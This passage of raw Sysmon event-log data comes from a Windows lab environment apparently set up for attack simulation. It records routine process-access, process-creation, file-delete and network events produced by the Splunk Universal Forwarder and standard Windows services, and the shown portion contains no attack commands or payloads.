Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F8B-6216-D004-000000003802}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.963{C8EA50B7-0F8B-6216-D004-000000003802}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.695{C8EA50B7-0F8B-6216-CF04-000000003802}6325088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.555{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=221E5EADE7CF9A6471F00D4FE4E61E32,SHA256=695961331A76806552469767D5EF460F4C09F00EBD12950FAE22EFC8ACE724F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215172Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:19.346{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C73E53F0810F20C57B8FA01E3BE92D8,SHA256=7CEC4503A91BC11385C52230D60F92633B465EF575ECE247D3AD7AFDDF3C5069,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.461{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F8B-6216-CF04-000000003802}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.461{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.461{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.461{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.461{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.461{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0F8B-6216-CF04-000000003802}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.461{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F8B-6216-CF04-000000003802}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.462{C8EA50B7-0F8B-6216-CF04-000000003802}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:20.899{C8EA50B7-0F8C-6216-D104-000000003802}60645948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:20.633{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F8C-6216-D104-000000003802}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:20.633{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:20.633{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:20.633{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:20.633{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:20.633{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0F8C-6216-D104-000000003802}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:20.633{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F8C-6216-D104-000000003802}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:20.634{C8EA50B7-0F8C-6216-D104-000000003802}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:20.586{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B516EE280B757FBF5859D6878427E2A8,SHA256=55425C3B0F7A7212A626455766D4CC2778BABED7B1D0408EFABEA75855661CE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215173Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:20.378{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E117C7300E4EE0C2BBBD00A6251DC62B,SHA256=40BCE0BF4BD3FE46CFCE7676F9D23E40DC869F79BC8B031166C3DBB796039CE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:20.258{C8EA50B7-0F8B-6216-D004-000000003802}5256996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000286268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:19.670{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53314-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:21.695{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D081764EF5DDAE0EF253AB0E661C7E,SHA256=C59DBABC9F18F16A0FBFA4A13D24C5FBB9049245ACDA4595CCCCBA542A83F7D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215174Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:21.393{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BB098DF866A876C2DAF67331651996B,SHA256=CB4CB72E49959342997B817B5B38BB1C755DF798D8FCBE9B8618CB187AD3D2D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:21.133{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F8D-6216-D204-000000003802}5512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:21.133{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:21.133{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 